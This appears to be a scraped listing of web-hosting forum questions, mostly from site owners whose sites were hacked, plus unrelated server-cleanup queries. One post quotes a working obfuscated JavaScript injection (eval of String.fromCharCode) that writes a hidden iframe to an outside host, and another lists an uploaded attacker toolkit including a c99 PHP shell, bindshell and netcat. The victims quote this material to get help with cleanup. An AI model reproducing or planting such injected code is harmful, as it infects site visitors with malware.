Best Way To Clean A Hacked Site?
Nov 9, 2009What is the best way to clean a hacked site?
All of the pages have iframe injection and my only backup was made after the attack.
I have hundreds of pages, do I have to edit them all manually?
ADVERTISEMENT
SITE WAS HACKED!
Jul 27, 2008A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?
View 6 Replies View RelatedMy Site Has Been Hacked
Oct 1, 2007One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.
Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.
I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.
Site Up And Down- Am I Being Hacked
Jun 22, 2009My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!
And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.
Quote:
<script type="text/javascript" src="swfobject.js"></script>
<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11 4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3 9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104, 50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114, 39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52, 52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>
What the heck is going on?
Site Is Hacked
Mar 4, 2008I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:
[url]
Unknown Script/hacked Site
Mar 10, 2008For a bit now, my site has been having probems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.
The script looks like this: ....
Youtube Clone Site Been Hacked
Nov 18, 2007The database has been changed. Some of the data has been altered
The tilte has been change to: Hacked By Genc_Rapci
Shell Uploaded - Site Hacked - How To Trace ?
Nov 6, 2008Shell uploaded - Site hacked - How to trace?
Many of my customers let me know that their websites had been hacked. I think it comes from local hacker ....
Site Hacked Via Php Script Placed In WordPress Uploads Directory
Apr 7, 2007First of all, I discoverd this forum during my quest to unravel the mysteries of how my site was hacked. I hope this is an appropriate forum to discuss the issues even though I am not a web hosting provider, but merely a customer of a web hosting company, hostrocket.com
I have an installation of WordPress 2.1 WordPress creates a couple world writable directories such as Uploads and Cache which are owned by nobody. Apparently (according to the tech support at hostrocket.com) someone was able to insert and exectue a php script in my world writable Uploads directory. Over 40MB of scripts, executables and files were uploaded. As best I can tell, my space was being used as some sort of link farm or perhaps acting as a server in my webspace. I do not have much knowledge about these things and consequently can't talk very inetlligently about them. But I am trying to grasp what little I am able to absorb about how this could have happened, what I can do to mitigate it from reocurring in the future.
Some of the stuff that was in the directory is as follows...
2421
bindz
h4ckerz
mass.pl p
trace-kmod
2421.1
brk
help.php
mybindshell
ptrace24
99.php
coredump
idf.php
netcat
pwned
CMD.php
dc.pl
index.html
online
r0nin
TMT.htm
elfdump
kmod2
online.tar.gz
raptor
TTdummyfile
gcc
krad3
prctl2
uselib24
bind.pl g
cc.1
list.txt
ptrace
The "online" directory contained over 40MB of directories such as...
abortion diethylpropion
accounting diflucan
accupril diovan
acne distance-education
actonel dospan
actos dovonex
acyclovir doxycycline
adderall drug
adipex drug-rehab
adventure-travel drug-test
adware dvd
adware-spyware e-pathto
affiliate-program effexor
air-travel elavil
aldara enalapril
alprazolam equity-loan
altace estradiol
amaryl evista
ambien fioricet
amitriptyline flexeril
amoxicillin flonase
amoxil florida-lottery
antivirus fluoxetine
atenolol fosamax
ativan free-poker
avandia free-slots
avapro free-spyware
baclofen furniture
bankruptcy gambling
bextra home-equity-loan
biaxin home-loan
bingo hosting
black-jack hotel
blackjack hydrocodone
blackjack-game images
bontril imitrex
britney-spears insurance-life
business internet-betting
buspar internet-gambling
buspirone loan
butalbital loans
buy-hardware lortab
buy-phentermine lottery
california-lottery lotto
captopril mesothelioma
car mortgages
car-insurance online-black-jack
carisoprodol online-casino
cars online-gambling
cartia online-loan
cash-loan online-pharmacy
casino online-poker
casino-games online-roulette
casino-las-vegas online-slot
celebrex payday-advances
celebrex-online phentermine
celexa poker
celexa-online poker-chips
cephalexin poker-game
cialis poker-tables
cigarette refinance
cigarettes refinance-house
cipro refinance-loan
claritin refinancing
clindamycin ringtones
clonazepam roulette
clonidine slot-machine
codeine slot-machines
consolidate-card slots
cozaar steroids
credit structured-settlement
credit-card texas-holdem
credit-card-debt texas-holdem-poker
credit-card-debt-consolidation texas-holdem-rules
creditcard texas-lottery
cyclobenzaprine tramadol
darvocet travel
dating travel-insurance
debt-consolidation ultram
debtcard valium
denavir viagra
diazepam vicodin
diclofenac video-poker
didrex wagering
diet-pills xanax
As you can see, I was had in a BIG way.
So the first thing my webhost had me do was to change ownership of the directories owned by nobody to me. Then I was able to change permissions from 777 to 755. However in so doing, I am no longer able to use the Dashboard of WordPress to upload images anymore, unless I temporarily change permissions back to 777.
The other thing the tech support guy did is to create an .htaccess file with,
php_flag engine off
I guess this basically renders php scripts impotent from running.
So without flaming me, can you help me understand how someone in a shared server environment is able to put a php script into one of my directories?
What amazed me was this particular script, "99.php" actually when viewed in a browser window titled phpshell was called "c99adult v. 1.0 pre-release build #16". It basically enabled whoever had access to the URL, to view my webspace, and do all sorts of nasty things. Talk about a wake-up call!
Obviously this enabled the hacker to view my config.php file and ascertain my database password and everything else. Whether he did, or whether there is a logfile of that info that could enable him to hack the database at some time in the future is unknown to me but it's really freaking me out.
RPM Clean Up
Jun 6, 2009How do you go about figuring out what to remove?
Example(groups):
Installed Groups:
Administration Tools
Base
Development Tools
Dial-up Networking Support
Editors
Input Methods
Legacy Fonts
Mail Server
MySQL Database
Network Servers
Printing Support
System Tools
Text-based Internet
Web Server
I'm sure its safe to remove printing, dial up, fonts, editors?, and web server(installed nginx).
but when I list individual RPMs i have over a few 100 to go through. anyone know of a few documents to help my research go faster?
/tmp Clean?
Jan 20, 2008I have some problems with /tmp:
When /tmp is more 20-50% clean out /tmp directory :
rm -f /tmp/sess_*
rm -f /tmp/*.wrk
it cleans tmp folder, but size folder still big and 50% . I fix it :
Run the following commands :
/bin/umount -l /tmp
/bin/umount -l /var/tmp
/bin/rm -fv /usr/tmpDSK
/scripts/securetmp
and it's OK.
The partitions remount only helps to fix it. Is it problem the file system ext3 ? Is there a wey yet to fix /tmp ?
FC6
cPanel
tmpfs ext3=2 Gb.
How To Clean All IP From Iptables
May 10, 2007In APF I can download deny_hosts.rules and delete all the IP there but how about iptalbes?
I tried to find the file that store the IP but I couldn't find it.
I flushed the iptalbes but when I restart it all the ip come back.
Code:
iptables --flush
and I also tried
Code:
[url]
Where is the ip stored at iptalbes?
Trojan :: How To Clean Server?
Aug 7, 2007my whm Trojan scanner found 23 possible Trojans.
how can i clean my server?
Clean Up Your Dedicated Server
Jan 5, 2009I think it's due time to clean up one of my server's. It's very time consuming to sit and try to go through the daily and weekly backup folders or the reseller center of WHM and compare accounts so that I know which backups stay and which backups go.
Whats the best way to clean up all those old backups? Would it be possible to just delete everything in them and then do something like copy the /home/ folder which has all active accounts over into the backup? Or just let the daily backup do it's thing?
Way To Clean Up /boot Partition
Mar 14, 2008I've got Centos 4 and I'm wondering what's the best way to cleanup my /boot partition?
Tried to do a yum update tonight and it included kernel, amongst other updates that belonged there so it stopped. I've googled around for commands to run and whatnot, but no go... or I just can't find it... if I had to clean it up I have an idea already about what to do, but I want to ask for advice first to see if there's an easier way.
so, how do people here clean up that partition?
How To Clean Mail Inbox
Jun 15, 2008By default,when domain is created by default it redirect all unrouted mail to default mail.And since i didnt notice that on time,now there is 100k mails.How do i delete that instantly?
View 7 Replies View RelatedClean Inboxs From Spam
Jul 3, 2007one of my customers, he gets a lot of spam emails. So i tell him to enable SpamAssassin.
He also tell me if i can clean the his users inboxs (20000+ emails). Not to delete all as they have emails that they need.
The 20000+ emails are before he enable SpamAssassin.
I need something to scans emails inboxs and move the spams to another folder.
Is possible to scan emails folders with spamassassin
Clean Memory, Linux
Jul 21, 2007Is there a command to clean up my Memory in Linux?
I use Plesk 8, Linux
When i execute "free -m" command it shows me:
total used free shared buffers cached
Mem: 1006 959 47 0 136 567
-/+ buffers/cache: 254 752
Swap: 4095 0 4095
Version:
Command: free -V
Result: procps version 3.2.3
How To Be Sure That IP Addresses Assigned From Host Are 'clean'
Nov 10, 2008I'm just curious, when getting IPs with a VPS or Dedicated server, is there any steps to take to make sure the IPs were used by a previous customer to spam or in other way get them blacklisted by Yahoo, AOL, Gmail, etc.?
View 6 Replies View RelatedHow To Install Gcc On A Clean Slackware Server
Mar 12, 2007how I can install GCC on a clean slackware 10.2 server. It doesnt have any cc compiler, so am not able to compile gcc. Are there any binaries of c compilers for slackware?
View 9 Replies View RelatedClean Old Accounts From Exim / CPanel
Nov 8, 2007We are having trouble with disk space on some of our shared hosting servers and we are wondering if anyone have a script to clean e-mails from exim not checked in the last 60 days ?
View 1 Replies View RelatedLinux: How To Clean Format A Disk
Oct 17, 2007How do i format a secondary drive in Ubuntu? I want to get the drive ready for RAID so it must be clean.
View 2 Replies View RelatedClean Up Unwanted Files From /tmp And Mail Queue
May 26, 2008How do i can perform
- Clean up unwanted files from /tmp
- Check and clean the mail queue
- Check /proc for hidden or unwanted processes
I will be thanking the person who can give in details how to perform each point in vps server and what's the steps or commands i should follow .
My ISP Sold Me Dirty IP Address, Should I Demand A Clean One
Mar 29, 2008I recently purchased a dedicated server from a company I found on these forums. I have been very happy with the company, but the 2 IP's I have with the server are blacklisted in many places. I have been systematically trying to clean the address, but am starting to think that it may be a losing battle.
My ISP has offered
I have assigned to your account the following ip:
ip:216.144.227.125
sm:255.255.255.240
You can bind Exim to a secondary IP using the steps below:
a. Login to the server as root using SSH and open the file /etc/exim.conf in
your favorite Unix text editor.
b. Locate the section of the file that contains the following:
remote_smtp:
driver = smtp
c. Replace this section with the following modified version:
remote_smtp:
driver = smtp
interface = 216.144.227.125
d. Restart Exim
I don't know anything about this. Can someone please tell me if this is the best route. I don't want this to create any other issues for my email, like causing reverse DNS issues. If this will totally solve my problem, fine. If not, shouldn't I demand to have clean IP's assigned to my server, especially since the service is advertised as such?
my IP's 72.11.145.112 72.11.145.113
Imaging Windows 2003 Server Clean Setup
Jun 11, 2008We are setting up 5 instances of Windows 2003 server on all the same server hardware. I want to spend the time setting up 1 instance, so installing windows updates, drivers, settings, configuration, then have the ability to mirror/image that perfect setup 4 other times.
View 2 Replies View RelatedPlesk 12.x / Linux :: How To Enable Clean Url With Website With Drupal 7
Sep 28, 2014how to enable clean url (mod_rewrite) with Plesk and Website with Drupal 7 ?
View 1 Replies View RelatedPlesk 12.x / Linux :: Clean URL Test Failed - Drupal 7.4
Feb 23, 2015My server is a debian 7 64 bits with plesk 12 last update.
A customer installed drupal 7.4 from plesk panel successful. However from Drupal/Configuration admin panel can not enable "Clean url". Clean test url failed too:
"The clean URL test failed"
.htaccess was ok .
I tried set domain vhost.con with (https://www.drupal.org/getting-started/clean-urls#enabling-7):
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !=/favicon.ico
RewriteRule ^ index.php [L]
</IfModule>
But it not worked (IApache have module rewrite loaded.)
I think maybe issue y for nginx. But I don't know how set this -> [URL] .... in nginx.conf of domain in plesk.
How to set clean url of Drupal in Plesk 12?
Can Rbl Antispam Filters Block Emails Sent Through Clean Email Servers
Jun 24, 2007I have noticed that a customer's emails are banned by certain RBL/antispam filters even though they are sent using SMTP-Authentication through a non-banned SMTP server.
It seems that its ISP IP is blacklisted..... Is this normal?
Plesk 12.x / Linux :: After Clean Install / Key Doesn't Work Anymore
Aug 31, 2014I have a fully working clean installation of Plesk 12 + updates (CentOS 6.5 x64). Previous installation was a test and was working just fine with the license file.Today I did a clean install. When I tried to restore my original key file (Parallels Plesk Panel 10.x/11.x and Later 100 Domains w/1 yr SUS) I get the following error:
Code:
ERROR: bad arguments (key_upload.php:76)
As result I'm not able to create domains and start using the server/panel.
Static Routes With Linux & Shorewall (site To Site VPN Virtual Private Network)
Mar 29, 2009Attached is a (badly) drawn diagram of two sites, connected by a vpn.
The site to the left, is network 10.0.0.0/24 which runs a linux server as the router for the network.
The site to the right, is network 10.1.0.0/24 which runs a windows 2003 server as the router for the network.
Now, my problem is, the clients behind the windows 2003 server can ping any machine on the first network because i setup a static route to route all traffic to 10.0.0.0/24 over the vpn interface.
now, my problem is, only the linux server can ping any machine on the windows 2003 network, any client behind the linux server cant seem to route over the interface.
I have the following route on the linux server: .....
